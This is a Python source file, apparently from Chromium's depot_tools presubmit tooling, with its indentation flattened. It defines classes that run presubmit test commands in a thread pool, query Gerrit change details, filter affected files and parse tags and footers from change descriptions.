class ThreadPool(object):
def __init__(self, pool_size=None, timeout=None):
self.timeout = timeout
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def _GetCommand(self, test):
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
# On Windows, scripts on the current directory take precedence over PATH, so
# that when testing depot_tools on Windows, calling `vpython.bat` will
# execute the copy of vpython of the depot_tools under test instead of the
# one in the bot.
# As a workaround, we run the tests from the parent directory instead.
if (cmd[0] == vpython and
'cwd' in test.kwargs and
os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
cmd[1] = os.path.join('depot_tools', cmd[1])
return cmd
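# Example of the rewriting above (hypothetical inputs): a test with
# cmd = ['python', 'foo.py'] and python3=True becomes ['vpython3', 'foo.py']
# (or ['vpython3.bat', 'foo.py'] on Windows), while cmd = ['bar.py'] is
# prefixed to ['vpython', 'bar.py'].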
def _RunWithTimeout(self, cmd, stdin, kwargs):
p = subprocess.Popen(cmd, **kwargs)
with Timer(self.timeout, p.terminate) as timer:
stdout, _ = sigint_handler.wait(p, stdin)
stdout = stdout.decode('utf-8', 'ignore') # Decode before formatting so the timeout message also works on Python 3
if timer.completed:
stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
return p.returncode, stdout
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of 'python'
to vpython invocations.
"""
cmd = self._GetCommand(test)
start = time_time() # Taken before the try so the except clause can always compute a duration
try:
returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
duration = time_time() - start
except Exception:
duration = time_time() - start
return test.message(
'%s\n%s exec failure (%4.2fs)\n%s' % (
test.name, ' '.join(cmd), duration, traceback.format_exc()))
if returncode != 0:
return test.message(
'%s\n%s (%4.2fs) failed\n%s' % (
test.name, ' '.join(cmd), duration, stdout))
if test.info:
return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
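# For example, on POSIX normpath('a//b/./c') returns 'a/b/c'. On Windows,
# os.sep backslashes are first rewritten to forward slashes and
# os.path.normpath then normalizes the result using backslashes again.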
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
sys.stdout.write(prompt_string)
sys.stdout.flush()
response = sys.stdin.readline().strip().lower()
return response in ('y', 'yes')
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(str(self._long_text))
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, url=None, project=None, branch=None):
self.host = urlparse.urlparse(url).netloc if url else None
self.project = project
self.branch = branch
self.cache = {}
self.code_owners_enabled = None
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, the API docs aren't very clear about what's inside, so see the tests for examples.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to the cache. We modify it here, adding the description
# to the right patchset if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def _GetApproversForLabel(self, issue, label):
change_info = self.GetChangeInfo(issue)
label_info = change_info.get('labels', {}).get(label, {})
values = label_info.get('values', {}).keys()
if not values:
return []
max_value = max(int(v) for v in values)
return [v for v in label_info.get('all', [])
if v.get('value', 0) == max_value]
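# Assumed shape of label_info under Gerrit's DETAILED_LABELS option, e.g.
# {'values': {' 0': 'No score', '+1': 'Looks good to me'},
# 'all': [{'value': 1, 'email': 'reviewer@example.com'}, ...]}
# so this returns every vote entry that matches the label's maximum value.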
def IsBotCommitApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
def IsOwnersOverrideApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
reviewers = self._GetApproversForLabel(issue, 'Code-Review')
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
def UpdateDescription(self, description, issue):
gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
def IsCodeOwnersEnabledOnRepo(self):
if self.code_owners_enabled is None:
self.code_owners_enabled = gerrit_util.IsCodeOwnersEnabledOnRepo(
self.host, self.project)
return self.code_owners_enabled
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_WHITE_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_WHITE_LIST.setter
def DEFAULT_WHITE_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_ALLOW_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_ALLOW_LIST.setter
def DEFAULT_ALLOW_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLACK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLACK_LIST.setter
def DEFAULT_BLACK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLOCK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLOCK_LIST.setter
def DEFAULT_BLOCK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cpplint = cpplint
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.re = re
self.subprocess = subprocess
self.sys = sys
self.tempfile = tempfile
self.time = time
self.unittest = unittest
if sys.version_info.major == 2:
self.urllib2 = urllib2
self.urllib_request = urllib_request
self.urllib_error = urllib_error
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'vpython' in order to allow scripts in other
# repos (e.g. src.git) to automatically pick up that repo's .vpython file,
# instead of inheriting the one in depot_tools.
self.python_executable = 'vpython'
# Offer a python 3 executable for use during the migration off of python 2.
self.python3_executable = 'vpython3'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
self.owners_client = None
if self.gerrit:
self.owners_client = owners_client.GetCodeOwnersClient(
root=change.RepositoryRoot(),
upstream=change.UpstreamBranch(),
host=self.gerrit.host,
project=self.gerrit.project,
branch=self.gerrit.branch)
self.owners_db = owners_db.Database(
change.RepositoryRoot(), fopen=open, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with 'base/containers/hash_tables.h' instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def SetTimeout(self, timeout):
self.thread_pool.timeout = timeout
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
    presubmit script. For example, it can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug('LocalPaths: %s', paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self,
affected_file,
files_to_check=None,
files_to_skip=None,
allow_list=None,
block_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
    Each list is compiled as a set of regular expressions; to be kept, an
    AffectedFile.LocalPath() must match files_to_check and must not match
    files_to_skip.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
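  # Example (hypothetical filter): restrict a check to Markdown files only:
  #   md_filter = lambda f: input_api.FilterSourceFile(
  #       f, files_to_check=[r'.+\.md$'], files_to_skip=[])
  #   files = input_api.AffectedSourceFiles(md_filter)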
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in 'new' version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
    Note: The line endings (LF or CR) are stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
      # Compute a single diff for all files and parse the output; with git
      # this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
      # the filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
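      # e.g. "diff --git a/foo bar.cc a/foo bar.cc" matches, with
      # 'filename' capturing 'a/foo bar.cc' despite the embedded space.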
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
    Deleted files are not text files."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
    Note: The line endings (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
    Note: The line endings (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
except UnicodeDecodeError as e:
# log the filename since we're probably trying to read a binary
# file, and shouldn't be.
print('Error reading %s: %s' % (self.AbsoluteLocalPath(), e))
raise
return self._cached_new_contents[:]
def ChangedContents(self, keeplinebreaks=False):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
# Don't return cached results when line breaks are requested.
if not keeplinebreaks and self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
result = []
line_num = 0
# The keeplinebreaks parameter to splitlines must be True or else the
# CheckForWindowsLineEndings presubmit will be a NOP.
for line in self.GenerateScmDiff().splitlines(keeplinebreaks):
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
result.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
# Don't cache results with line breaks.
if keeplinebreaks:
      return result
self._cached_changed_contents = result
return self._cached_changed_contents[:]
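  # Worked example (illustrative diff fragment):
  #   @@ -10,2 +12,3 @@
  #   -old line
  #   +new line one
  #   +new line two
  # yields [(12, 'new line one'), (13, 'new line two')]: line numbers come
  # from the hunk header, only '+' lines (and not the '+++' file header)
  # are collected, and '-' lines do not advance the line counter.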
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or 'tag') lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def UpstreamBranch(self):
"""Returns the upstream branch for the change."""
return self._upstream
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. 'FOO='
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or 'tag' lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
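  # Example (hypothetical description): for
  #   'Fix the widget\n\nBUG=123\nTBR=reviewer@example.com'
  # this leaves tags == {'BUG': '123', 'TBR': 'reviewer@example.com'} and
  # DescriptionText() returns just 'Fix the widget'.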
def AddDescriptionFooter(self, key, value):
"""Adds the given footer to the change description.
Args:
key: A string with the key for the git footer. It must conform to
the git footers format (i.e. 'List-Of-Tokens') and will be case
normalized so that each token is title-cased.
value: A string with the value for the git footer.
"""
description = git_footers.add_footer(
self.FullDescriptionText(), git_footers.normalize_name(key), value)
self.SetDescriptionText(description)
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r'^[A-Z_]*$', attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def GitFootersFromDescription(self):
"""Return the git footers present in the description.
Returns:
footers: A dict of {footer: [values]} containing a multimap of the footers
in the change description.
"""
return git_footers.parse_footers(self.FullDescriptionText())
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
parsed = self.GitFootersFromDescription()
unsplit_footers = parsed.get('Bug', []) + parsed.get('Fixed', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a 'R:' git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(crbug.com/839208): Remove support for 'Tbr:' when TBRs are
# programmatically determined by self-CR+1s.
footers = self.GitFootersFromDescription().get('Tbr', [])
return sorted(set(tags + footers))
# TODO(crbug.com/753425): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
